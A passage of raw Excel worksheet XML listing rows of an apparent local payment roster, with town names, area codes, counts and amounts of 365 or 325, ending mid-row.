      <c r="B2517" s="17" t="s">
        <v>6635</v>
      </c>
      <c r="C2517" s="17" t="s">
        <v>6635</v>
      </c>
      <c r="D2517" s="23" t="s">
        <v>571</v>
      </c>
      <c r="E2517" s="24" t="s">
        <v>6648</v>
      </c>
      <c r="F2517" s="17" t="s">
        <v>6637</v>
      </c>
      <c r="G2517" s="17">
        <v>1</v>
      </c>
      <c r="H2517" s="18">
        <v>365</v>
      </c>
      <c r="I2517" s="17">
        <f t="shared" si="122"/>
        <v>365</v>
      </c>
      <c r="J2517" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2517" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2518" customHeight="1" spans="1:11">
      <c r="A2518" s="16" t="s">
        <v>6649</v>
      </c>
      <c r="B2518" s="17" t="s">
        <v>6635</v>
      </c>
      <c r="C2518" s="17" t="s">
        <v>6635</v>
      </c>
      <c r="D2518" s="17" t="s">
        <v>6650</v>
      </c>
      <c r="E2518" s="17" t="s">
        <v>6651</v>
      </c>
      <c r="F2518" s="17" t="s">
        <v>6637</v>
      </c>
      <c r="G2518" s="17">
        <v>1</v>
      </c>
      <c r="H2518" s="18">
        <v>365</v>
      </c>
      <c r="I2518" s="17">
        <f t="shared" si="122"/>
        <v>365</v>
      </c>
      <c r="J2518" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2518" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2519" customHeight="1" spans="1:11">
      <c r="A2519" s="16" t="s">
        <v>6652</v>
      </c>
      <c r="B2519" s="17" t="s">
        <v>6635</v>
      </c>
      <c r="C2519" s="17" t="s">
        <v>6653</v>
      </c>
      <c r="D2519" s="17" t="s">
        <v>6654</v>
      </c>
      <c r="E2519" s="17" t="s">
        <v>6655</v>
      </c>
      <c r="F2519" s="17" t="s">
        <v>6637</v>
      </c>
      <c r="G2519" s="17">
        <v>1</v>
      </c>
      <c r="H2519" s="18">
        <v>375</v>
      </c>
      <c r="I2519" s="17">
        <f t="shared" si="122"/>
        <v>375</v>
      </c>
      <c r="J2519" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2519" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2520" customHeight="1" spans="1:11">
      <c r="A2520" s="16" t="s">
        <v>6656</v>
      </c>
      <c r="B2520" s="17" t="s">
        <v>6635</v>
      </c>
      <c r="C2520" s="17" t="s">
        <v>5367</v>
      </c>
      <c r="D2520" s="17" t="s">
        <v>6657</v>
      </c>
      <c r="E2520" s="17" t="s">
        <v>6658</v>
      </c>
      <c r="F2520" s="17" t="s">
        <v>6637</v>
      </c>
      <c r="G2520" s="17">
        <v>1</v>
      </c>
      <c r="H2520" s="18">
        <v>365</v>
      </c>
      <c r="I2520" s="17">
        <f t="shared" si="122"/>
        <v>365</v>
      </c>
      <c r="J2520" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2520" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2521" customHeight="1" spans="1:11">
      <c r="A2521" s="16" t="s">
        <v>6659</v>
      </c>
      <c r="B2521" s="17" t="s">
        <v>6635</v>
      </c>
      <c r="C2521" s="17" t="s">
        <v>3448</v>
      </c>
      <c r="D2521" s="17" t="s">
        <v>6660</v>
      </c>
      <c r="E2521" s="17" t="s">
        <v>6661</v>
      </c>
      <c r="F2521" s="17" t="s">
        <v>6662</v>
      </c>
      <c r="G2521" s="17">
        <v>1</v>
      </c>
      <c r="H2521" s="18">
        <v>365</v>
      </c>
      <c r="I2521" s="17">
        <f t="shared" si="122"/>
        <v>365</v>
      </c>
      <c r="J2521" s="17" t="s">
        <v>4667</v>
      </c>
      <c r="K2521" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2522" customHeight="1" spans="1:11">
      <c r="A2522" s="16" t="s">
        <v>6663</v>
      </c>
      <c r="B2522" s="17" t="s">
        <v>6635</v>
      </c>
      <c r="C2522" s="17" t="s">
        <v>6127</v>
      </c>
      <c r="D2522" s="17" t="s">
        <v>6664</v>
      </c>
      <c r="E2522" s="17" t="s">
        <v>6665</v>
      </c>
      <c r="F2522" s="17" t="s">
        <v>6637</v>
      </c>
      <c r="G2522" s="17">
        <v>1</v>
      </c>
      <c r="H2522" s="18">
        <v>365</v>
      </c>
      <c r="I2522" s="17">
        <f t="shared" si="122"/>
        <v>365</v>
      </c>
      <c r="J2522" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2522" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2523" customHeight="1" spans="1:11">
      <c r="A2523" s="16" t="s">
        <v>6666</v>
      </c>
      <c r="B2523" s="17" t="s">
        <v>6635</v>
      </c>
      <c r="C2523" s="17" t="s">
        <v>5377</v>
      </c>
      <c r="D2523" s="17" t="s">
        <v>6667</v>
      </c>
      <c r="E2523" s="17" t="s">
        <v>6668</v>
      </c>
      <c r="F2523" s="17" t="s">
        <v>6637</v>
      </c>
      <c r="G2523" s="17">
        <v>2</v>
      </c>
      <c r="H2523" s="18">
        <v>325</v>
      </c>
      <c r="I2523" s="17">
        <f t="shared" si="122"/>
        <v>650</v>
      </c>
      <c r="J2523" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2523" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2524" customHeight="1" spans="1:11">
      <c r="A2524" s="16" t="s">
        <v>6669</v>
      </c>
      <c r="B2524" s="17" t="str">
        <f>B2523</f>
        <v>乔端镇</v>
      </c>
      <c r="C2524" s="17" t="str">
        <f>C2523</f>
        <v>县社</v>
      </c>
      <c r="D2524" s="92" t="s">
        <v>6670</v>
      </c>
      <c r="E2524" s="93" t="s">
        <v>6651</v>
      </c>
      <c r="F2524" s="17" t="str">
        <f>F2523</f>
        <v>4113211407</v>
      </c>
      <c r="G2524" s="17"/>
      <c r="H2524" s="17"/>
      <c r="I2524" s="17"/>
      <c r="J2524" s="17"/>
      <c r="K2524" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2525" customHeight="1" spans="1:11">
      <c r="A2525" s="16" t="s">
        <v>6671</v>
      </c>
      <c r="B2525" s="17" t="s">
        <v>6672</v>
      </c>
      <c r="C2525" s="17" t="s">
        <v>6672</v>
      </c>
      <c r="D2525" s="17" t="s">
        <v>6673</v>
      </c>
      <c r="E2525" s="17" t="s">
        <v>6674</v>
      </c>
      <c r="F2525" s="17">
        <v>4113211507</v>
      </c>
      <c r="G2525" s="17">
        <v>2</v>
      </c>
      <c r="H2525" s="18">
        <v>325</v>
      </c>
      <c r="I2525" s="17">
        <f>H2525*G2525</f>
        <v>650</v>
      </c>
      <c r="J2525" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2525" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2526" customHeight="1" spans="1:11">
      <c r="A2526" s="16" t="s">
        <v>6675</v>
      </c>
      <c r="B2526" s="17" t="str">
        <f>B2525</f>
        <v>马市坪乡</v>
      </c>
      <c r="C2526" s="17" t="str">
        <f>C2525</f>
        <v>马市坪乡</v>
      </c>
      <c r="D2526" s="16" t="s">
        <v>6676</v>
      </c>
      <c r="E2526" s="16" t="s">
        <v>445</v>
      </c>
      <c r="F2526" s="17">
        <f>F2525</f>
        <v>4113211507</v>
      </c>
      <c r="G2526" s="17"/>
      <c r="H2526" s="17"/>
      <c r="I2526" s="17"/>
      <c r="J2526" s="17"/>
      <c r="K2526" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2527" customHeight="1" spans="1:11">
      <c r="A2527" s="16" t="s">
        <v>6677</v>
      </c>
      <c r="B2527" s="17" t="s">
        <v>6672</v>
      </c>
      <c r="C2527" s="17" t="s">
        <v>6672</v>
      </c>
      <c r="D2527" s="17" t="s">
        <v>6678</v>
      </c>
      <c r="E2527" s="17" t="s">
        <v>6679</v>
      </c>
      <c r="F2527" s="17">
        <v>4113211507</v>
      </c>
      <c r="G2527" s="17">
        <v>1</v>
      </c>
      <c r="H2527" s="18">
        <v>365</v>
      </c>
      <c r="I2527" s="17">
        <f t="shared" ref="I2527:I2553" si="123">H2527*G2527</f>
        <v>365</v>
      </c>
      <c r="J2527" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2527" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2528" customHeight="1" spans="1:11">
      <c r="A2528" s="16" t="s">
        <v>6680</v>
      </c>
      <c r="B2528" s="17" t="s">
        <v>6672</v>
      </c>
      <c r="C2528" s="17" t="s">
        <v>6672</v>
      </c>
      <c r="D2528" s="17" t="s">
        <v>6681</v>
      </c>
      <c r="E2528" s="17" t="s">
        <v>6682</v>
      </c>
      <c r="F2528" s="17">
        <v>4113211507</v>
      </c>
      <c r="G2528" s="17">
        <v>1</v>
      </c>
      <c r="H2528" s="18">
        <v>365</v>
      </c>
      <c r="I2528" s="17">
        <f t="shared" si="123"/>
        <v>365</v>
      </c>
      <c r="J2528" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2528" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2529" customHeight="1" spans="1:11">
      <c r="A2529" s="16" t="s">
        <v>6683</v>
      </c>
      <c r="B2529" s="17" t="s">
        <v>6672</v>
      </c>
      <c r="C2529" s="17" t="s">
        <v>6672</v>
      </c>
      <c r="D2529" s="17" t="s">
        <v>6684</v>
      </c>
      <c r="E2529" s="17" t="s">
        <v>6685</v>
      </c>
      <c r="F2529" s="17">
        <v>4113211507</v>
      </c>
      <c r="G2529" s="17">
        <v>1</v>
      </c>
      <c r="H2529" s="18">
        <v>365</v>
      </c>
      <c r="I2529" s="17">
        <f t="shared" si="123"/>
        <v>365</v>
      </c>
      <c r="J2529" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2529" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2530" customHeight="1" spans="1:11">
      <c r="A2530" s="16" t="s">
        <v>6686</v>
      </c>
      <c r="B2530" s="17" t="s">
        <v>6672</v>
      </c>
      <c r="C2530" s="17" t="s">
        <v>5367</v>
      </c>
      <c r="D2530" s="17" t="s">
        <v>6687</v>
      </c>
      <c r="E2530" s="17" t="s">
        <v>6688</v>
      </c>
      <c r="F2530" s="17">
        <v>4113211507</v>
      </c>
      <c r="G2530" s="17">
        <v>1</v>
      </c>
      <c r="H2530" s="18">
        <v>365</v>
      </c>
      <c r="I2530" s="17">
        <f t="shared" si="123"/>
        <v>365</v>
      </c>
      <c r="J2530" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2530" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2531" customHeight="1" spans="1:11">
      <c r="A2531" s="16" t="s">
        <v>6689</v>
      </c>
      <c r="B2531" s="17" t="s">
        <v>6672</v>
      </c>
      <c r="C2531" s="17" t="s">
        <v>5367</v>
      </c>
      <c r="D2531" s="17" t="s">
        <v>6690</v>
      </c>
      <c r="E2531" s="17" t="s">
        <v>6691</v>
      </c>
      <c r="F2531" s="17">
        <v>4113211507</v>
      </c>
      <c r="G2531" s="17">
        <v>1</v>
      </c>
      <c r="H2531" s="18">
        <v>365</v>
      </c>
      <c r="I2531" s="17">
        <f t="shared" si="123"/>
        <v>365</v>
      </c>
      <c r="J2531" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2531" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2532" customHeight="1" spans="1:11">
      <c r="A2532" s="16" t="s">
        <v>6692</v>
      </c>
      <c r="B2532" s="17" t="s">
        <v>6672</v>
      </c>
      <c r="C2532" s="17" t="s">
        <v>6127</v>
      </c>
      <c r="D2532" s="17" t="s">
        <v>6693</v>
      </c>
      <c r="E2532" s="17" t="s">
        <v>6694</v>
      </c>
      <c r="F2532" s="17">
        <v>4113211507</v>
      </c>
      <c r="G2532" s="17">
        <v>1</v>
      </c>
      <c r="H2532" s="18">
        <v>365</v>
      </c>
      <c r="I2532" s="17">
        <f t="shared" si="123"/>
        <v>365</v>
      </c>
      <c r="J2532" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2532" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2533" customHeight="1" spans="1:11">
      <c r="A2533" s="16" t="s">
        <v>6695</v>
      </c>
      <c r="B2533" s="17" t="s">
        <v>6672</v>
      </c>
      <c r="C2533" s="17" t="s">
        <v>6341</v>
      </c>
      <c r="D2533" s="17" t="s">
        <v>6696</v>
      </c>
      <c r="E2533" s="17" t="s">
        <v>6697</v>
      </c>
      <c r="F2533" s="17">
        <v>4113211507</v>
      </c>
      <c r="G2533" s="17">
        <v>1</v>
      </c>
      <c r="H2533" s="18">
        <v>365</v>
      </c>
      <c r="I2533" s="17">
        <f t="shared" si="123"/>
        <v>365</v>
      </c>
      <c r="J2533" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2533" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2534" customHeight="1" spans="1:11">
      <c r="A2534" s="16" t="s">
        <v>6698</v>
      </c>
      <c r="B2534" s="17" t="s">
        <v>6672</v>
      </c>
      <c r="C2534" s="17" t="s">
        <v>3448</v>
      </c>
      <c r="D2534" s="17" t="s">
        <v>6699</v>
      </c>
      <c r="E2534" s="17" t="s">
        <v>6700</v>
      </c>
      <c r="F2534" s="17">
        <v>4113211507</v>
      </c>
      <c r="G2534" s="17">
        <v>1</v>
      </c>
      <c r="H2534" s="18">
        <v>365</v>
      </c>
      <c r="I2534" s="17">
        <f t="shared" si="123"/>
        <v>365</v>
      </c>
      <c r="J2534" s="17" t="s">
        <v>4599</v>
      </c>
      <c r="K2534" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2535" customHeight="1" spans="1:11">
      <c r="A2535" s="16" t="s">
        <v>6701</v>
      </c>
      <c r="B2535" s="17" t="s">
        <v>6672</v>
      </c>
      <c r="C2535" s="17" t="s">
        <v>6702</v>
      </c>
      <c r="D2535" s="17" t="s">
        <v>6703</v>
      </c>
      <c r="E2535" s="17" t="s">
        <v>6704</v>
      </c>
      <c r="F2535" s="17">
        <v>4113211507</v>
      </c>
      <c r="G2535" s="17">
        <v>1</v>
      </c>
      <c r="H2535" s="18">
        <v>365</v>
      </c>
      <c r="I2535" s="17">
        <f t="shared" si="123"/>
        <v>365</v>
      </c>
      <c r="J2535" s="17" t="s">
        <v>4667</v>
      </c>
      <c r="K2535" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2536" customHeight="1" spans="1:11">
      <c r="A2536" s="16" t="s">
        <v>6705</v>
      </c>
      <c r="B2536" s="17" t="s">
        <v>6672</v>
      </c>
      <c r="C2536" s="17" t="s">
        <v>5377</v>
      </c>
      <c r="D2536" s="17" t="s">
        <v>6706</v>
      </c>
      <c r="E2536" s="17" t="s">
        <v>6707</v>
      </c>
      <c r="F2536" s="17">
        <v>4113211507</v>
      </c>
      <c r="G2536" s="17">
        <v>1</v>
      </c>
      <c r="H2536" s="18">
        <v>365</v>
      </c>
      <c r="I2536" s="17">
        <f t="shared" si="123"/>
        <v>365</v>
      </c>
      <c r="J2536" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2536" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2537" customHeight="1" spans="1:11">
      <c r="A2537" s="16" t="s">
        <v>6708</v>
      </c>
      <c r="B2537" s="17" t="s">
        <v>6672</v>
      </c>
      <c r="C2537" s="17" t="s">
        <v>5377</v>
      </c>
      <c r="D2537" s="17" t="s">
        <v>6709</v>
      </c>
      <c r="E2537" s="17" t="s">
        <v>6710</v>
      </c>
      <c r="F2537" s="17">
        <v>4113211507</v>
      </c>
      <c r="G2537" s="17">
        <v>1</v>
      </c>
      <c r="H2537" s="18">
        <v>365</v>
      </c>
      <c r="I2537" s="17">
        <f t="shared" si="123"/>
        <v>365</v>
      </c>
      <c r="J2537" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2537" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2538" customHeight="1" spans="1:11">
      <c r="A2538" s="16" t="s">
        <v>6711</v>
      </c>
      <c r="B2538" s="17" t="s">
        <v>6712</v>
      </c>
      <c r="C2538" s="17" t="s">
        <v>6712</v>
      </c>
      <c r="D2538" s="17" t="s">
        <v>6713</v>
      </c>
      <c r="E2538" s="17" t="s">
        <v>578</v>
      </c>
      <c r="F2538" s="17" t="s">
        <v>6714</v>
      </c>
      <c r="G2538" s="17">
        <v>1</v>
      </c>
      <c r="H2538" s="18">
        <v>365</v>
      </c>
      <c r="I2538" s="17">
        <f t="shared" si="123"/>
        <v>365</v>
      </c>
      <c r="J2538" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2538" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2539" customHeight="1" spans="1:11">
      <c r="A2539" s="16" t="s">
        <v>6715</v>
      </c>
      <c r="B2539" s="17" t="s">
        <v>6712</v>
      </c>
      <c r="C2539" s="17" t="s">
        <v>6712</v>
      </c>
      <c r="D2539" s="17" t="s">
        <v>6716</v>
      </c>
      <c r="E2539" s="17" t="s">
        <v>6717</v>
      </c>
      <c r="F2539" s="17" t="s">
        <v>6718</v>
      </c>
      <c r="G2539" s="17">
        <v>1</v>
      </c>
      <c r="H2539" s="18">
        <v>365</v>
      </c>
      <c r="I2539" s="17">
        <f t="shared" si="123"/>
        <v>365</v>
      </c>
      <c r="J2539" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2539" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2540" customHeight="1" spans="1:11">
      <c r="A2540" s="16" t="s">
        <v>6719</v>
      </c>
      <c r="B2540" s="17" t="s">
        <v>6712</v>
      </c>
      <c r="C2540" s="17" t="s">
        <v>6712</v>
      </c>
      <c r="D2540" s="17" t="s">
        <v>6720</v>
      </c>
      <c r="E2540" s="17" t="s">
        <v>6721</v>
      </c>
      <c r="F2540" s="17" t="s">
        <v>6722</v>
      </c>
      <c r="G2540" s="17">
        <v>1</v>
      </c>
      <c r="H2540" s="18">
        <v>365</v>
      </c>
      <c r="I2540" s="17">
        <f t="shared" si="123"/>
        <v>365</v>
      </c>
      <c r="J2540" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2540" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2541" customHeight="1" spans="1:11">
      <c r="A2541" s="16" t="s">
        <v>6723</v>
      </c>
      <c r="B2541" s="17" t="s">
        <v>6712</v>
      </c>
      <c r="C2541" s="17" t="s">
        <v>6712</v>
      </c>
      <c r="D2541" s="17" t="s">
        <v>6724</v>
      </c>
      <c r="E2541" s="17" t="s">
        <v>6725</v>
      </c>
      <c r="F2541" s="17" t="s">
        <v>6722</v>
      </c>
      <c r="G2541" s="17">
        <v>1</v>
      </c>
      <c r="H2541" s="18">
        <v>365</v>
      </c>
      <c r="I2541" s="17">
        <f t="shared" si="123"/>
        <v>365</v>
      </c>
      <c r="J2541" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2541" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2542" customHeight="1" spans="1:11">
      <c r="A2542" s="16" t="s">
        <v>6726</v>
      </c>
      <c r="B2542" s="17" t="s">
        <v>6712</v>
      </c>
      <c r="C2542" s="17" t="s">
        <v>6712</v>
      </c>
      <c r="D2542" s="17" t="s">
        <v>6727</v>
      </c>
      <c r="E2542" s="17" t="s">
        <v>6728</v>
      </c>
      <c r="F2542" s="17" t="s">
        <v>6729</v>
      </c>
      <c r="G2542" s="17">
        <v>1</v>
      </c>
      <c r="H2542" s="18">
        <v>365</v>
      </c>
      <c r="I2542" s="17">
        <f t="shared" si="123"/>
        <v>365</v>
      </c>
      <c r="J2542" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2542" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2543" customHeight="1" spans="1:11">
      <c r="A2543" s="16" t="s">
        <v>6730</v>
      </c>
      <c r="B2543" s="17" t="s">
        <v>6712</v>
      </c>
      <c r="C2543" s="17" t="s">
        <v>6712</v>
      </c>
      <c r="D2543" s="17" t="s">
        <v>6731</v>
      </c>
      <c r="E2543" s="17" t="s">
        <v>6732</v>
      </c>
      <c r="F2543" s="17" t="s">
        <v>6718</v>
      </c>
      <c r="G2543" s="17">
        <v>1</v>
      </c>
      <c r="H2543" s="18">
        <v>365</v>
      </c>
      <c r="I2543" s="17">
        <f t="shared" si="123"/>
        <v>365</v>
      </c>
      <c r="J2543" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2543" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2544" customHeight="1" spans="1:11">
      <c r="A2544" s="16" t="s">
        <v>6733</v>
      </c>
      <c r="B2544" s="17" t="s">
        <v>6712</v>
      </c>
      <c r="C2544" s="17" t="s">
        <v>3448</v>
      </c>
      <c r="D2544" s="17" t="s">
        <v>6734</v>
      </c>
      <c r="E2544" s="17" t="s">
        <v>6735</v>
      </c>
      <c r="F2544" s="17" t="s">
        <v>6718</v>
      </c>
      <c r="G2544" s="17">
        <v>1</v>
      </c>
      <c r="H2544" s="18">
        <v>365</v>
      </c>
      <c r="I2544" s="17">
        <f t="shared" si="123"/>
        <v>365</v>
      </c>
      <c r="J2544" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2544" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2545" customHeight="1" spans="1:11">
      <c r="A2545" s="16" t="s">
        <v>6736</v>
      </c>
      <c r="B2545" s="17" t="s">
        <v>6712</v>
      </c>
      <c r="C2545" s="17" t="s">
        <v>6737</v>
      </c>
      <c r="D2545" s="17" t="s">
        <v>6738</v>
      </c>
      <c r="E2545" s="17" t="s">
        <v>6739</v>
      </c>
      <c r="F2545" s="17" t="s">
        <v>6740</v>
      </c>
      <c r="G2545" s="17">
        <v>1</v>
      </c>
      <c r="H2545" s="18">
        <v>365</v>
      </c>
      <c r="I2545" s="17">
        <f t="shared" si="123"/>
        <v>365</v>
      </c>
      <c r="J2545" s="17" t="s">
        <v>6741</v>
      </c>
      <c r="K2545" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2546" customHeight="1" spans="1:11">
      <c r="A2546" s="16" t="s">
        <v>6742</v>
      </c>
      <c r="B2546" s="17" t="s">
        <v>6712</v>
      </c>
      <c r="C2546" s="17" t="s">
        <v>6743</v>
      </c>
      <c r="D2546" s="17" t="s">
        <v>6744</v>
      </c>
      <c r="E2546" s="17" t="s">
        <v>6745</v>
      </c>
      <c r="F2546" s="17" t="s">
        <v>6746</v>
      </c>
      <c r="G2546" s="17">
        <v>1</v>
      </c>
      <c r="H2546" s="18">
        <v>365</v>
      </c>
      <c r="I2546" s="17">
        <f t="shared" si="123"/>
        <v>365</v>
      </c>
      <c r="J2546" s="17" t="s">
        <v>6747</v>
      </c>
      <c r="K2546" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2547" customHeight="1" spans="1:11">
      <c r="A2547" s="16" t="s">
        <v>6748</v>
      </c>
      <c r="B2547" s="17" t="s">
        <v>6712</v>
      </c>
      <c r="C2547" s="17" t="s">
        <v>6749</v>
      </c>
      <c r="D2547" s="17" t="s">
        <v>6750</v>
      </c>
      <c r="E2547" s="17" t="s">
        <v>6751</v>
      </c>
      <c r="F2547" s="17" t="s">
        <v>6752</v>
      </c>
      <c r="G2547" s="17">
        <v>1</v>
      </c>
      <c r="H2547" s="18">
        <v>365</v>
      </c>
      <c r="I2547" s="17">
        <f t="shared" si="123"/>
        <v>365</v>
      </c>
      <c r="J2547" s="17" t="s">
        <v>5963</v>
      </c>
      <c r="K2547" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2548" customHeight="1" spans="1:11">
      <c r="A2548" s="16" t="s">
        <v>6753</v>
      </c>
      <c r="B2548" s="17" t="s">
        <v>6712</v>
      </c>
      <c r="C2548" s="17" t="s">
        <v>3448</v>
      </c>
      <c r="D2548" s="17" t="s">
        <v>6754</v>
      </c>
      <c r="E2548" s="17" t="s">
        <v>6755</v>
      </c>
      <c r="F2548" s="17" t="s">
        <v>6718</v>
      </c>
      <c r="G2548" s="17">
        <v>1</v>
      </c>
      <c r="H2548" s="18">
        <v>365</v>
      </c>
      <c r="I2548" s="17">
        <f t="shared" si="123"/>
        <v>365</v>
      </c>
      <c r="J2548" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2548" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2549" customHeight="1" spans="1:11">
      <c r="A2549" s="16" t="s">
        <v>6756</v>
      </c>
      <c r="B2549" s="17" t="s">
        <v>6712</v>
      </c>
      <c r="C2549" s="17" t="s">
        <v>6712</v>
      </c>
      <c r="D2549" s="17" t="s">
        <v>6757</v>
      </c>
      <c r="E2549" s="17" t="s">
        <v>6758</v>
      </c>
      <c r="F2549" s="17" t="s">
        <v>6714</v>
      </c>
      <c r="G2549" s="17">
        <v>1</v>
      </c>
      <c r="H2549" s="18">
        <v>365</v>
      </c>
      <c r="I2549" s="17">
        <f t="shared" si="123"/>
        <v>365</v>
      </c>
      <c r="J2549" s="29">
        <v>45627</v>
      </c>
      <c r="K2549" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2550" customHeight="1" spans="1:11">
      <c r="A2550" s="16" t="s">
        <v>6759</v>
      </c>
      <c r="B2550" s="92" t="s">
        <v>6712</v>
      </c>
      <c r="C2550" s="94" t="s">
        <v>6760</v>
      </c>
      <c r="D2550" s="94" t="s">
        <v>6761</v>
      </c>
      <c r="E2550" s="92" t="s">
        <v>239</v>
      </c>
      <c r="F2550" s="17" t="s">
        <v>6718</v>
      </c>
      <c r="G2550" s="17">
        <v>1</v>
      </c>
      <c r="H2550" s="18">
        <v>365</v>
      </c>
      <c r="I2550" s="17">
        <f t="shared" si="123"/>
        <v>365</v>
      </c>
      <c r="J2550" s="29">
        <v>45505</v>
      </c>
      <c r="K2550" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2551" customHeight="1" spans="1:11">
      <c r="A2551" s="16" t="s">
        <v>6762</v>
      </c>
      <c r="B2551" s="17" t="s">
        <v>6712</v>
      </c>
      <c r="C2551" s="17" t="s">
        <v>3436</v>
      </c>
      <c r="D2551" s="17" t="s">
        <v>6763</v>
      </c>
      <c r="E2551" s="17" t="s">
        <v>3597</v>
      </c>
      <c r="F2551" s="17" t="s">
        <v>6752</v>
      </c>
      <c r="G2551" s="17">
        <v>1</v>
      </c>
      <c r="H2551" s="18">
        <v>365</v>
      </c>
      <c r="I2551" s="17">
        <f t="shared" si="123"/>
        <v>365</v>
      </c>
      <c r="J2551" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2551" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2552" customHeight="1" spans="1:11">
      <c r="A2552" s="16" t="s">
        <v>6764</v>
      </c>
      <c r="B2552" s="17" t="s">
        <v>6765</v>
      </c>
      <c r="C2552" s="17" t="s">
        <v>6766</v>
      </c>
      <c r="D2552" s="17" t="s">
        <v>6767</v>
      </c>
      <c r="E2552" s="17" t="s">
        <v>5088</v>
      </c>
      <c r="F2552" s="17" t="s">
        <v>5369</v>
      </c>
      <c r="G2552" s="17">
        <v>1</v>
      </c>
      <c r="H2552" s="18">
        <v>365</v>
      </c>
      <c r="I2552" s="17">
        <f t="shared" si="123"/>
        <v>365</v>
      </c>
      <c r="J2552" s="29">
        <v>45108</v>
      </c>
      <c r="K2552" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2553" customHeight="1" spans="1:11">
      <c r="A2553" s="16" t="s">
        <v>6768</v>
      </c>
      <c r="B2553" s="17" t="s">
        <v>6765</v>
      </c>
      <c r="C2553" s="17" t="s">
        <v>6766</v>
      </c>
      <c r="D2553" s="17" t="s">
        <v>6769</v>
      </c>
      <c r="E2553" s="17" t="s">
        <v>6770</v>
      </c>
      <c r="F2553" s="17" t="s">
        <v>5369</v>
      </c>
      <c r="G2553" s="17">
        <v>2</v>
      </c>
      <c r="H2553" s="18">
        <v>325</v>
      </c>
      <c r="I2553" s="17">
        <f t="shared" si="123"/>
        <v>650</v>
      </c>
      <c r="J2553" s="29">
        <v>45108</v>
      </c>
      <c r="K2553" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2554" customHeight="1" spans="1:11">
      <c r="A2554" s="16" t="s">
        <v>6771</v>
      </c>
      <c r="B2554" s="17" t="str">
        <f>B2553</f>
        <v>军工办</v>
      </c>
      <c r="C2554" s="17" t="str">
        <f>C2553</f>
        <v>红阳厂社区</v>
      </c>
      <c r="D2554" s="23" t="s">
        <v>6772</v>
      </c>
      <c r="E2554" s="23" t="s">
        <v>5151</v>
      </c>
      <c r="F2554" s="17" t="str">
        <f>F2553</f>
        <v>4113210699</v>
      </c>
      <c r="G2554" s="17"/>
      <c r="H2554" s="17"/>
      <c r="I2554" s="17"/>
      <c r="J2554" s="29"/>
      <c r="K2554" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2555" customHeight="1" spans="1:11">
      <c r="A2555" s="16" t="s">
        <v>6773</v>
      </c>
      <c r="B2555" s="17" t="s">
        <v>6765</v>
      </c>
      <c r="C2555" s="17" t="s">
        <v>6766</v>
      </c>
      <c r="D2555" s="17" t="s">
        <v>6774</v>
      </c>
      <c r="E2555" s="17" t="s">
        <v>6775</v>
      </c>
      <c r="F2555" s="17" t="s">
        <v>5369</v>
      </c>
      <c r="G2555" s="17">
        <v>1</v>
      </c>
      <c r="H2555" s="18">
        <v>365</v>
      </c>
      <c r="I2555" s="17">
        <f t="shared" ref="I2555:I2565" si="124">H2555*G2555</f>
        <v>365</v>
      </c>
      <c r="J2555" s="29">
